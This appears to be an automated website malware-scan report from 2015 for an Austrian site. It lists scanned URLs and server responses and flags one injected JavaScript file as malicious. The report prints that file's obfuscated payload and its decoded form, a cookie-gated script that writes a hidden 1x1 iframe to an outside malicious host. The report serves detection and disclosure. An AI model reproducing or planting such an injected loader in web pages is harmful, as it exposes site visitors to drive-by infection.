Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hoertnagel.at
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.hoertnagel.at/ | HTTP/1.1 302 Moved Temporarily Date: Mon, 02 Mar 2015 15:29:18 GMT Location: http://members.aon.at/ahortnag Server: squid/2.5.STABLE10 Content-Length: 0 | clean |
http://members.aon.at/ahortnag | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 02 Mar 2015 15:29:18 GMT Location: http://members.aon.at/ahortnag/ Server: Apache Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from members.aon.at | clean |
http://members.aon.at/ahortnag/ | 200 OK Content-Length: 5144 Content-Type: text/html | clean |
http://members.aon.at/ahortnag/newgeocheck.js | 200 OK Content-Length: 7265 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var geocheck = true;
var secureNewgeoB;if(secureNewgeoB!='' && secureNewgeoB!='mIR'){secureNewgeoB='fKDE'};this.zAP=30722;var gECheck;var xP=false;gECheck='f8faf9fcfafff5ffb9e1cafbdee7f4d9f3f7e3e2f9e3f1b6a2eef9fbdfc8b9bcf4e8f8f3e'+'ff0cdc9ede9aeb8e8f6dec5b7bff4cbd3eaf0e6b092e7effae6f9fca1aae29480a7ba8ef4'+'ffb8a2ecf3f7f3fff1fffbe0e8a0a6f09784bbabb694baa2eef9e59ba8b3a7acb0eca1e4e'+'cd4f18fe8e0e8a494a4ba80bbadbb9e99b1f9efd9dff8f5b2d7cde0fcd9e0cd91f4c4d8e8'+'e8fa8dc8f6fed7f Decoded script: function setCookie(name, value, expiredays, path, domain, secure) { if (expiredays) { var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires = exdate.toGMTString(); } document.cookie = name + "=" + escape(value) + ((expiredays) ? "; expires=" + expires : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : ""); } fu } return setStr; } var user = getCookie("secheck"); if (user !=777){ document.write('<iframe src="http://addthiss.net/in.cgi?8" width=1 height=1 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>' ); setCookie("secheck", "777", 7, "/"); } <iframe src="http://addthiss.net/in.cgi?8" width=1 height=1 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe> Antivirus reports:
| ||
http://www.hoertnagel.at/seite_harmonika.htm | HTTP/1.1 302 Moved Temporarily Date: Mon, 02 Mar 2015 15:29:19 GMT Location: http://members.aon.at/ahortnag/seite_harmonika.htm Server: squid/2.5.STABLE10 Content-Length: 0 | clean |
http://members.aon.at/ahortnag/seite_harmonika.htm | 200 OK Content-Length: 15482 Content-Type: text/html | clean |
http://members.aon.at/ahortnag/images/23pal_gros.gif | 200 OK Content-Length: 70973 Content-Type: image/gif | clean |
http://members.aon.at/test404page.js | HTTP/1.1 302 Moved Temporarily Date: Mon, 02 Mar 2015 15:29:20 GMT Location: http://www.a1.net Server: squid/2.5.STABLE10 Content-Length: 0 | clean |
http://www.a1.net/ | 200 OK Content-Length: 73677 Content-Type: text/html | clean |
http://cdn3.a1.net/final/de/js/jquery-min.js | 200 OK Content-Length: 187747 Content-Type: application/javascript | clean |
http://cdn1.a1.net/final/de/js/bundle_start.js | 200 OK Content-Length: 150253 Content-Type: application/javascript | clean |
http://cdn2.a1.net/final/de/js/tracking.js | 200 OK Content-Length: 165970 Content-Type: application/javascript | clean |
http://cdn3.a1.net/final/de/js/trackEvents.js | 200 OK Content-Length: 2426 Content-Type: application/javascript | clean |
https://www.googleadservices.com/pagead/conversion.js | 200 OK Content-Length: 10722 Content-Type: text/javascript | clean |
https://ta.mopinion.nl/custom/ta/mopinion.min.js | 200 OK Content-Length: 44377 Content-Type: application/javascript | clean |
http://members.aon.at//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 302 Moved Temporarily Date: Mon, 02 Mar 2015 15:29:25 GMT Location: http://www.a1.net Server: squid/2.5.STABLE10 Content-Length: 0 | clean |
http://www.a1.net/test404page.js | HTTP/1.1 404 Not Found Cache-Control: no-cache Connection: close Date: Mon, 02 Mar 2015 15:29:25 GMT Pragma: no-cache Location: / Server: Server Vary: Accept-Encoding,User-Agent Content-Encoding: identity Content-Language: de Content-Length: 37891 Content-Type: text/html; charset=utf-8 Expires: Mon, 02 Mar 2015 15:29:25 GMT Lsrequestid: 220123177 Set-Cookie: JSESSIONID=F95C48695541D5B2644B35E656C42773.b155d113-9598-3bb8-9fba-40e622b16e46; Path=/cps Set-Cookie: LIVESESSION_ONEPORTAL=SID-48E572A4-AC40DABD; Path=/ Set-Cookie: LIVESESSION_ONEPORTAL=SID-48E572A4-AC40DABD; Path=/ Set-Cookie: aaaStaticCookie=lvpaaa1;path=/;domain=.a1.net; HttpOnly | clean |
http://www.hoertnagel.at/seite%2023.htm | HTTP/1.1 302 Moved Temporarily Date: Mon, 02 Mar 2015 15:29:26 GMT Location: http://members.aon.at/ahortnag/seite%2023.htm Server: squid/2.5.STABLE10 Content-Length: 0 | clean |
http://members.aon.at/ahortnag/seite%2023.htm | 200 OK Content-Length: 2351 Content-Type: text/html | clean |
http://www.hoertnagel.at/images/33_b.gross.gif | HTTP/1.1 302 Moved Temporarily Date: Mon, 02 Mar 2015 15:29:27 GMT Location: http://members.aon.at/ahortnag/images/33_b.gross.gif Server: squid/2.5.STABLE10 Content-Length: 0 | clean |
http://members.aon.at/ahortnag/images/33_b.gross.gif | 200 OK Content-Length: 122308 Content-Type: image/gif | clean |
http://www.hoertnagel.at/seite%2033.htm | HTTP/1.1 302 Moved Temporarily Date: Mon, 02 Mar 2015 15:29:27 GMT Location: http://members.aon.at/ahortnag/seite%2033.htm Server: squid/2.5.STABLE10 Content-Length: 0 | clean |
http://members.aon.at/ahortnag/seite%2033.htm | 200 OK Content-Length: 6124 Content-Type: text/html | clean |
http://www.hoertnagel.at/seite%2034.htm | HTTP/1.1 302 Moved Temporarily Date: Mon, 02 Mar 2015 15:29:28 GMT Location: http://members.aon.at/ahortnag/seite%2034.htm Server: squid/2.5.STABLE10 Content-Length: 0 | clean |
http://members.aon.at/ahortnag/seite%2034.htm | 200 OK Content-Length: 10275 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hoertnagel.at
Result:
GET / HTTP/1.1
Host: hoertnagel.at
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hoertnagel.at
Referer: http://www.google.com/search?q=hoertnagel.at
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hoertnagel.at
Referer: http://www.google.com/search?q=hoertnagel.at
Result:
The result is similar to the first query. There are no suspicious redirects found.